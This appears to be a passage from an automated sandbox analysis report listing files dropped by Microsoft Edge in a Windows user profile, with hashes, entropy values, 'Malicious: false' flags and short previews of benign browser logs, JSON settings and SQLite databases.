Preview:	2024/11/25-05:33:54.873 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/25-05:33:54.875 1f70 Recovering log #3.2024/11/25-05:33:54.878 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0dd84eb8-ee2d-4883-9b14-1c84aef16d52.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
MD5:	ABE81C38891A875B52127ACE9C314105
SHA1:	8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
SHA-256:	6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
SHA-512:	B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\237b71be-2451-4d85-adc7-b39870019d51.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\29d3e708-56f5-4dc1-abc4-b4828fdd9af5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
MD5:	ABE81C38891A875B52127ACE9C314105
SHA1:	8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
SHA-256:	6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
SHA-512:	B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF4268f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d549f04c-37c4-4822-b2f2-97fce6224d63.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.2104608553489635
Encrypted:	false
SSDEEP:	12:gz+v4YebvqBZFUt87T/+7fRV5LYebvqBaJ:l4Yebvyg8SRLYebvL
MD5:	BE56EE7ACA09508BF96166F9188E1767
SHA1:	484BEAF3055E384B5727A90769B373CF86977224
SHA-256:	2359A49DBBF906390698BEADA7CBDE146A226FD4BBCC24B868AC19004AC35047
SHA-512:	7EEBA3821A2D6721F99C4F456D41ABEA28C4B511553B6B8CE5430B6A6661E5DCA77B01AD8F32C7F7D5B4D0B3E1B22D349F8646EF987635A4B369357F3CC068B1
Malicious:	false
Preview:	2024/11/25-05:34:11.159 1f2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/25-05:34:11.160 1f2c Recovering log #3.2024/11/25-05:34:11.166 1f2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.2104608553489635
Encrypted:	false
SSDEEP:	12:gz+v4YebvqBZFUt87T/+7fRV5LYebvqBaJ:l4Yebvyg8SRLYebvL
MD5:	BE56EE7ACA09508BF96166F9188E1767
SHA1:	484BEAF3055E384B5727A90769B373CF86977224
SHA-256:	2359A49DBBF906390698BEADA7CBDE146A226FD4BBCC24B868AC19004AC35047
SHA-512:	7EEBA3821A2D6721F99C4F456D41ABEA28C4B511553B6B8CE5430B6A6661E5DCA77B01AD8F32C7F7D5B4D0B3E1B22D349F8646EF987635A4B369357F3CC068B1
Malicious:	false
Preview:	2024/11/25-05:34:11.159 1f2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/25-05:34:11.160 1f2c Recovering log #3.2024/11/25-05:34:11.166 1f2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.185358624531322
Encrypted:	false
SSDEEP:	6:HAXQtDYIq2P923oH+TcwtpIFUt8YAXQt+Zmw+YAXQtykwO923oH+Tcwta/WLJ:gAtDYIv4YebmFUt87At+/+7Aty5LYeb7
MD5:	D9C3B5D18F23AAC66BA5E3795FC6D7FB
SHA1:	275509F3E7DAB23E23C3011389909863C9420ED9
SHA-256:	1C3E50FDFCB6560672C1494CB52490B51A0A804440CDCA47CC8346DBB27B883E
SHA-512:	04E39BA60D5A3F3EF74B7D4924C8AFC1B5019D7C98C8588D3D72C89171FDA86AE0F836258D1222B3B0B783EB5C8A0E2DA49882162EDB76CBD93E8CCAFAB88CDB
Malicious:	false
Preview:	2024/11/25-05:33:54.069 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/25-05:33:54.070 1e44 Recovering log #3.2024/11/25-05:33:54.070 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.185358624531322
Encrypted:	false
SSDEEP:	6:HAXQtDYIq2P923oH+TcwtpIFUt8YAXQt+Zmw+YAXQtykwO923oH+Tcwta/WLJ:gAtDYIv4YebmFUt87At+/+7Aty5LYeb7
MD5:	D9C3B5D18F23AAC66BA5E3795FC6D7FB
SHA1:	275509F3E7DAB23E23C3011389909863C9420ED9
SHA-256:	1C3E50FDFCB6560672C1494CB52490B51A0A804440CDCA47CC8346DBB27B883E
SHA-512:	04E39BA60D5A3F3EF74B7D4924C8AFC1B5019D7C98C8588D3D72C89171FDA86AE0F836258D1222B3B0B783EB5C8A0E2DA49882162EDB76CBD93E8CCAFAB88CDB
Malicious:	false
Preview:	2024/11/25-05:33:54.069 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/25-05:33:54.070 1e44 Recovering log #3.2024/11/25-05:33:54.070 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2653280550435502
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkM3SAELyKOMq+8yC8F/YfU5m+OlTLVum8H:Bq+n0J39ELyKOMq+8y9/Ow/
MD5:	D209E03919804F832E6557A18F5CB531
SHA1:	A8924D119F036FF0E28758CC5F2D0E4CBF643182
SHA-256:	E5D6EEEFDDF7BA9000ED45A5BCB35A0A6EC9F301684EBC463BFA85BE4780248C
SHA-512:	437E86961376078D014B95B2A13CC8F0AD05BAB3D5ADE19DB3A4A29EF0F11C6B06771D12BD3A9C2BEA71C3416B98BF12FC895EFECAD64931E4EEE62592B3C251
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4665666519319425
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0Q5:v7doKsKuKZKlZNmu46yjx0S
MD5:	DEBC802AD5D934BA5D7F617343EAE0C7
SHA1:	A4F523973C76A83557E114477DD38F4AAF5B80F7
SHA-256:	5B67E6DAF17CE9D9C0E453C3EF156797CC021851F8E40FAF5CE0B8A72461B9C0
SHA-512:	F8CC78E56F4D32BEE7E4334C14126DAD66DC3E6390677B849FF2B68E84BF043B8E8F7A3B12D3FAD93F5BF12C81177689CCF38B96E6903985556E5EBE6C017E9D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	0.13766033093567093
Encrypted:	false
SSDEEP:	3:IO/l9HNllv/etXlR1mpZa+/34//l/h4jRfn1d7jdtQfhlKj/INmX7DOlsXtXlR1Q:IHlybTv4puj3dndklKj/ibClyV
MD5:	19E51E63F40A3389A5B339F444205241
SHA1:	50A0F6AD6AF9817EE615D5DCDE05EB32607871FC
SHA-256:	951C3227140CE4E4BDF25971884F7C3FEF54C6E39DD1A6D1E415C7195CD02338
SHA-512:	B76EA80E0AF607715FC9C4014A3214E8CBE88E131796EB64DD5A097303F9F44FFB1973FBE78E67CBFCDAE1DAC1BBC02B1B2895AE36D95403220BC46A2DA9A204
Malicious:	false
Preview:	............C.SL........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bd7418f8-a0f2-4de6-ad26-acbf6f673c08.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9817
Entropy (8bit):	5.109680917336071
Encrypted:	false
SSDEEP:	192:stpkdpwsIQKsZihUk7fHA48ObV+FT+QA66WqaFIMYX+PRYJ:stpQwsIQKfhj/rbGiQx6WqaTYXh
MD5:	29F229BD91ED927B1572C33F5F48753B
SHA1:	F98A1E75BF8ACD6B9959B4EA6EEB671E1907E9E8
SHA-256:	2513B846BB3F0FD2E733AB05FB93109860E2832DCCF97D5ADC6990971A320029
SHA-512:	17DBB2C0EF091EF9C845D77581EA1DA16F57A29BD6738D70A2AD6764A205A527EFB75EDBB0C2F4F99F630B45DD0703F1285D0107ECB59EC7954CC50524F6500B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d044ea84-fc99-4a28-988c-7adc56c4b7eb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.568133553479284
Encrypted:	false
SSDEEP:	768:dHENOCxbWPMCfC18F1+UoAYDCx9Tuqh0VfUC9xbog/OVVwv62rwWp4tum:dkACxbWPMCfC1u1jagY6Ttt9
MD5:	2031C55DAFA09785FC63A056D8E2A845
SHA1:	10FA810880B9BEB732441C564E4B5F9BFF95340A
SHA-256:	1EB8191D9D6DC940A15D7060A88E168B09DB80C2E5180FB34EA7C40713AED09B
SHA-512:	4FF3DC1C6B0492878FFC8DDBA8150FCC16E0A46CC4C2BD6A0DB2E80D3455ED9A75A35E76F50E6190A1F8202A14416C559D13019079DE1BFED585AB38560667AB
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377004433895179","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377004433895179","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f01e2021-85af-4286-a877-c1bb115acee0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10257948433074167
Encrypted:	false
SSDEEP:	6:Gu09MB09MT89XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl0:+9T9UspEjVl/PnnnnnnnnnnnvoQ/Eou
MD5:	995C33B2312C8786F9D7C8FAC1504749
SHA1:	50C62239DF3E75D8AC65F122384BAD6161B8AD6D
SHA-256:	4A59E35E445BE8748FA789221C46C1282EF73C10E86F48FA4460CDC996B51D1C
SHA-512:	3282E1E2540938F21898CFE1B03945171A7892A2950F2FAD198F1CFAB9837483CA678B69F9E7C2F07E283547937C74868A86C0B383DB5A300B7D088E65636FCC
Malicious:	false
Preview:	..-.............M........_.0.W[B.4..}..nUW;.....-.............M........_.0.W[B.4..}..nUW;...........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8912074092094188
Encrypted:	false
SSDEEP:	384:G20gdyDUZryOQ0xyY6d7yv6/5y86Ex2yV6bHyc6NhyT6vny46va19y56Pv8Tyays:bbnAdNiN6Ux1
MD5:	AEF55F852975DF409DFFD9FDB3D2BF24
SHA1:	233922986299000C9696D9A433126022ACBCB482
SHA-256:	0C47B5EF6833A7FC6FF21DF42D0E215F599C0EC17E269C0FB6F1DEDB48341603
SHA-512:	2A7F7762F4682DDFC2A04B28679FAEFB865ED8CA88C84D6C1DDFDA8719C36FE6F7D7FBBEB8900F050BB78EBC068CCE5BC7E5DFB20744C98494A70BFBFAD1844F
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

